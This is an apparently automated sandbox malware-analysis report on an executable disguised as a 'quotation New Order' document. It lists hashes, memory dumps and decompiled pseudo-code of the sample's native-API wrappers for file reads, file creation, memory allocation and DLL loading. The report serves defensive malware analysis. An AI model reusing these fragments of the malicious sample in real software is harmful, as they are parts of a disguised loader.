Source File: 00000001.00000002.304014205.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6320000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14ce6db132f625c00ea3608ebe954b683de237a034a20c7edd06b3a38eebfdfb
Instruction ID: c2ebcf0e0e3a8faed145c77cce5fbbda37233946f69500637a669d924be2d729
Opcode Fuzzy Hash: 14ce6db132f625c00ea3608ebe954b683de237a034a20c7edd06b3a38eebfdfb
Instruction Fuzzy Hash: EDE01A76505318EFDB108E56EC48CAFBF6CFB89365B10402AF81993310C731AC01CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 06327408, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304014205.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6320000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e77399bb26689ca5916024398f7cb8f0ebe89973f4c36dbd33d0b428a9ec2772
Instruction ID: 75802cecc043394d65e81e441b2a3c27372be3a6ba107b08b7fa01fc646e81ca
Opcode Fuzzy Hash: e77399bb26689ca5916024398f7cb8f0ebe89973f4c36dbd33d0b428a9ec2772
Instruction Fuzzy Hash: C4E04835B105198FCB04AA6DE8058DDBBB9EFC6611B014166E5059B220EF709959C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 0632C51A, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304014205.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6320000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d193e97240215de9e0e62a133e3e9ef3b691fe510eb34fb1ab2b5859eaaf4c73
Instruction ID: 51a933e5c81c4ecd20d4c9567781aba1f91d26e24200120dba66f4ab25eea596
Opcode Fuzzy Hash: d193e97240215de9e0e62a133e3e9ef3b691fe510eb34fb1ab2b5859eaaf4c73
Instruction Fuzzy Hash: 9DE0B66240EBD45ED7979B308D6588A3F705E6760074A50DBE4C0CF0B3E199981DD763

Uniqueness

Uniqueness Score: -1.00%

Function 0632F970, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304014205.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6320000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf8f9a71e8d0b5a3049d1f3daa2e3514155ae722b97f5d3b1f002f7c3303845
Instruction ID: 08c43c7fbc7106cd653e6be349dc3ff2d37ca9bc8e7e57bed74cc523416b30ae
Opcode Fuzzy Hash: 8cf8f9a71e8d0b5a3049d1f3daa2e3514155ae722b97f5d3b1f002f7c3303845
Instruction Fuzzy Hash: F4D05E3A36022413869836FD58156AFA2DE87CABB5B00006EE60AC7384DDA2AC0247F5

Uniqueness

Uniqueness Score: -1.00%

Function 06329B61, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304014205.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6320000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90d796766f6077e8cde9c1dfa366a6d9755c1737e8d2074a2ee76b01c75fa0f3
Instruction ID: 2fb6ef91eecd807847076f9d43106eea9c2b09059336466caf1e34053ee4abe1
Opcode Fuzzy Hash: 90d796766f6077e8cde9c1dfa366a6d9755c1737e8d2074a2ee76b01c75fa0f3
Instruction Fuzzy Hash: 81E08CF2A082428FC38A8B688C162043E62F7A410174605A6A092CB78BFB60C58AC7C6

Uniqueness

Uniqueness Score: -1.00%

Function 063299F0, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304014205.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6320000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b19bfa51aecd4ad3770e4c19149fa5fb29791630d89c094c8fe6a3f35db8faa
Instruction ID: 0b316817be2c4106ba610daf8aaf7171b6d7232abd346becc2848808bce0688d
Opcode Fuzzy Hash: 7b19bfa51aecd4ad3770e4c19149fa5fb29791630d89c094c8fe6a3f35db8faa
Instruction Fuzzy Hash: 30E0C23038076B03D2243AAC94007E7758A9B92724F00063DD5BA4B7C1DFF6294053E6

Uniqueness

Uniqueness Score: -1.00%

Function 06326720, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304014205.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6320000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b967add807c0f57f54be2b3fe3a856b10c3c0b027fc9d3a546454bf17518ba7
Instruction ID: 15ad9560930c1f39d5be4936cce43d9732283630181c6be1fb390715cefd7303
Opcode Fuzzy Hash: 8b967add807c0f57f54be2b3fe3a856b10c3c0b027fc9d3a546454bf17518ba7
Instruction Fuzzy Hash: 2AD0C962311928578A48A1D998169AFE39EDB85AA0B4400ABF609C7744DA155E0583F6

Uniqueness

Uniqueness Score: -1.00%

Function 0632DC20, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304014205.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6320000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f9e56625dd9efe026a0136dfb92e0e1333288cb4e7438a7d46ada48d8bb171
Instruction ID: 189833b021e7ef449ac3797b7ab0c2190c1fa826ea220c345689c541e9f7f7a8
Opcode Fuzzy Hash: f6f9e56625dd9efe026a0136dfb92e0e1333288cb4e7438a7d46ada48d8bb171
Instruction Fuzzy Hash: 2ED05E72C093A54ED7E25A71A81828A6FB48FCA610F09889BD094AB755F0E8984947D0

Uniqueness

Uniqueness Score: -1.00%

Function 0632E390, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304014205.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6320000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c93e7be805ac0f36b846f8fc7075fbce8f4d2dda9e08862adafb5e7bb92fcae
Instruction ID: 35319b7da5437eb1818f06ef5f9fb3de83fc3fa3e031396a1824f5f97425866e
Opcode Fuzzy Hash: 0c93e7be805ac0f36b846f8fc7075fbce8f4d2dda9e08862adafb5e7bb92fcae
Instruction Fuzzy Hash: 3ED0A9B18221008BCE008A08E90BB9133AAE30CB06F60290AD40082610EA2869C08681

Uniqueness

Uniqueness Score: -1.00%

Function 06327008, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304014205.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6320000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eafb728b916176d86d5840480ae0c603a471b0d1f5f4efb043a9f2ccd742318
Instruction ID: 750a980044b86082b371ef447e9e6ff8aa59f5cb1438d03c7141b03708214f4b
Opcode Fuzzy Hash: 6eafb728b916176d86d5840480ae0c603a471b0d1f5f4efb043a9f2ccd742318
Instruction Fuzzy Hash: B8C08C3A300208BFDB81AFD4DC01D963BADAF08B00F609000FE080E202C232E962DBE4

Uniqueness

Uniqueness Score: -1.00%

Function 0632FF9B, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.304014205.0000000006320000.00000040.00000001.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6320000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b47c7262e54d67c2e288931f865302b58e5d535dba87bcc601d142b7baa8462
Instruction ID: 80860ece780eadd90f6ac7a13a981152997ed3cdcd2f9cc8b70fba2e4383d09e
Opcode Fuzzy Hash: 7b47c7262e54d67c2e288931f865302b58e5d535dba87bcc601d142b7baa8462
Instruction Fuzzy Hash: 379002196C086902D9C43250CC0131A44659786BA1FD45554462659744CD18940216A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0193F3D0, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.300746014.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1930000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b80f819255c0f1ec3a1286d7203040b559e26275bb68d8b3e3ed5f024672fa04
Instruction ID: 7df41e5a35167797ee51e9f779e1f95b94cb44c1d297a0d15ff2f67da1c07182
Opcode Fuzzy Hash: b80f819255c0f1ec3a1286d7203040b559e26275bb68d8b3e3ed5f024672fa04
Instruction Fuzzy Hash: B112B5F1C137668AE310EF65F99C1893BA1B746329BB0C209D2611EADCD7F4116ACF84

Uniqueness

Uniqueness Score: -1.00%

Function 0193CF74, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.300746014.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1930000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b1e10500ad254daf2b1eaa40df7e5abaad76bcf0b9b8c8d806ccd1bf59b0161
Instruction ID: 893a96978ed64ff9c8223db89c83205ace7235623cce179fd39f7c86f26a2f0e
Opcode Fuzzy Hash: 9b1e10500ad254daf2b1eaa40df7e5abaad76bcf0b9b8c8d806ccd1bf59b0161
Instruction Fuzzy Hash: D1A18D32E0061ACFCF05DFA5D8545DEBBF6FFC5300B15856AE909AB221DB31A916CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0193F3C0, Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.300746014.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1930000_quotation New Order I5117.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9f26daeb9d8af2dfda56ba5e3bbef7a4cc7f45a3c93e96c58eff599fd04ddb2
Instruction ID: 5f3f533623fdb1e9d8af67f175afacb367c6c940122e4c158dadd5ec2c53241f
Opcode Fuzzy Hash: a9f26daeb9d8af2dfda56ba5e3bbef7a4cc7f45a3c93e96c58eff599fd04ddb2
Instruction Fuzzy Hash: AAC107B1C127668BD710EF64F99C1893BA1BB86328F71C209D2612F6D8D7F41566CF84

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: quotation New Order I5117.exe PID: 6800 Parent PID: 6380 quotation New Order I5117.exeCOMMON

Execution Graph

Execution Coverage:	8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3%
Total number of Nodes:	690
Total number of Limit Nodes:	75

Executed Functions

Function 0041867A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0041867A(void* __eax, void* __edi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t20;
				void* _t30;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				_t30 = __edi;
				asm("les ebp, [ebp+edx*2-0x75]");
				_t15 = _a4;
				_t32 = _a4 + 0xc48;
				E004191D0(_t30, _t15, _t32,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t20 =  *((intOrPtr*)( *_t32))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t31, _t34); // executed
				return _t20;
			}

0x0041867a
0x0041867e
0x00418683
0x0041868f
0x00418697
0x0041869c
0x004186a2
0x004186bd
0x004186c5
0x004186c9

APIs

NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5

Strings

b=A, xrefs: 004186BD, 004186C4
!:A, xrefs: 0041869C, 004186A8
b=A, xrefs: 004186A2, 004186B0

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: e22ed1b30b9ccfbd26c958a2e9f051c9ce299b53aa7a18cf6c39b741bae047b3
Instruction ID: 077675f11e088d38bce1ef34ead6d8fcaaed0e773b5b294920bbe8e48b263338
Opcode Fuzzy Hash: e22ed1b30b9ccfbd26c958a2e9f051c9ce299b53aa7a18cf6c39b741bae047b3
Instruction Fuzzy Hash: 4DF0E7B2200108ABDB14DF99DC95DEB77A9EF8C354F168248FE1DD7250D630E856CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418680, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418683
0x0041868f
0x00418697
0x0041869c
0x004186a2
0x004186bd
0x004186c5
0x004186c9

APIs

NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5

Strings

b=A, xrefs: 004186BD, 004186C4
!:A, xrefs: 0041869C, 004186A8
b=A, xrefs: 004186A2, 004186B0

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !:A$b=A$b=A
API String ID: 2738559852-704622139
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B380(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B600( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419710(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b4c
0x00409b4f
0x00409b54
0x00409b59
0x00409b63
0x00409b68
0x00409b6b
0x00409b6d
0x00409b75
0x00409b7a
0x00409b7a
0x00409b81
0x00409b89
0x00409b8c
0x00409b8e
0x00409ba2
0x00000000
0x00409ba4
0x00409baa
0x00409b5e
0x00409b5e
0x00409b5e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004185CA, Relevance: 1.5, APIs: 1, Instructions: 44
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E004185CA(void* __eax, void* __ebx, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				intOrPtr _v117;
				long _t25;
				void* _t37;

				asm("hlt");
				asm("insd");
				asm("stosb");
				_v117 = _v117 - __edx;
				_t19 = _a4;
				_t5 = _t19 + 0xc40; // 0xc40
				E004191D0(_t37, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t25 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t25;
			}

0x004185cc
0x004185cd
0x004185ce
0x004185cf
0x004185d3
0x004185df
0x004185e7
0x0041861d
0x00418621

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 34dc2d46e292358254fe2cf116b486054d192b0fa22e47f7b97aabad2c12d970
Instruction ID: bbbf0a8a4e7e33c359391da2a8c0302bf768a0165a32689875a93f58edee9bc2
Opcode Fuzzy Hash: 34dc2d46e292358254fe2cf116b486054d192b0fa22e47f7b97aabad2c12d970
Instruction Fuzzy Hash: 1F01D2B6200108AFCB08CFA9CC94DEB77A9AF8C354F158248FA0D93241C630E8418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185df
0x004185e7
0x0041861d
0x00418621

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187bf
0x004187c7
0x004187e9
0x004187ed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004186FA, Relevance: 1.5, APIs: 1, Instructions: 23
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004186FA(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				void* _v117;
				intOrPtr _t10;
				long _t13;
				void* _t19;

				asm("scasb");
				_t10 = _a4;
				_t4 = _t10 + 0x10; // 0x300
				_t5 = _t10 + 0xc50; // 0x409753
				E004191D0(_t19, _t10, _t5,  *_t4, 0, 0x2c);
				_t13 = NtClose(_a8); // executed
				return _t13;
			}

0x004186fa
0x00418703
0x00418706
0x0041870f
0x00418717
0x00418725
0x00418729

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ddfb2afc7e289f61a90d68a76ef10bc30cd78621f07c59538eea8e85c179f0bc
Instruction ID: 087686f56f0f2208ee5f2bc98f9b0706bed2adc3ab20287500283dd044229125
Opcode Fuzzy Hash: ddfb2afc7e289f61a90d68a76ef10bc30cd78621f07c59538eea8e85c179f0bc
Instruction Fuzzy Hash: 31E08C35240114BFD724EBA8CC8AEDF7B68EF44390F148159F908DB242C630E942CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 00418700, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418700(intOrPtr _a4, void* _a8) {
				intOrPtr _t5;
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191D0(_t11, _t5, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00418703
0x00418706
0x0041870f
0x00418717
0x00418725
0x00418729

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041872A, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E0041872A(void* __eax, void* __eflags, void* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, intOrPtr _a20, void* _a24, intOrPtr _a28) {
				intOrPtr* __esi;
				void* __ebp;
				long _t16;
				void* _t19;

				_t13 = __eax;
				asm("in al, dx");
				if(__eflags != 0) {
					_t1 = _t13 + 0x10; // 0x300
					_t2 = _t13 + 0xc50; // 0x409753
					E004191D0(_t19, __eax, _t2,  *_t1, 0, 0x2c);
					_t16 = NtClose(_a12); // executed
					return _t16;
				} else {
					asm("iretd");
					__eflags = __eax;
					__ebp = __esp;
					__eax = _a4;
					__esi = _a4 + 0xc58;
					__eax = _a24;
					__eax = _a12;
					__eax =  *((intOrPtr*)( *__esi))(_a8, _a12, _a16, _a20, _a24, _a28, __esi, __ebp);
					_pop(__esi);
					_pop(__ebp);
					return _a12;
				}
			}

0x0041872a
0x0041872a
0x0041872b
0x00418706
0x0041870f
0x00418717
0x00418725
0x00418729
0x0041872d
0x0041872d
0x0041872e
0x00418731
0x00418733
0x0041873f
0x0041874f
0x0041875d
0x00418769
0x0041876b
0x0041876c
0x0041876d
0x0041876d

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: c1bc0b8763eb837e39228a03b587cf0bec99470a0d293d78cdfa279f12934565
Instruction ID: 222f28a52a21b1942c5a977ab3aeeedad06e591655e65b16b61152690aab461a
Opcode Fuzzy Hash: c1bc0b8763eb837e39228a03b587cf0bec99470a0d293d78cdfa279f12934565
Instruction Fuzzy Hash: B7D02E322002007BE610EBD88C48FE33B28EF80310F2405AAFA1CAB182C934A601C2E0

Uniqueness

Uniqueness Score: -1.00%

Function 004088C0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_quotation New Order I5117.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 004188D6, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

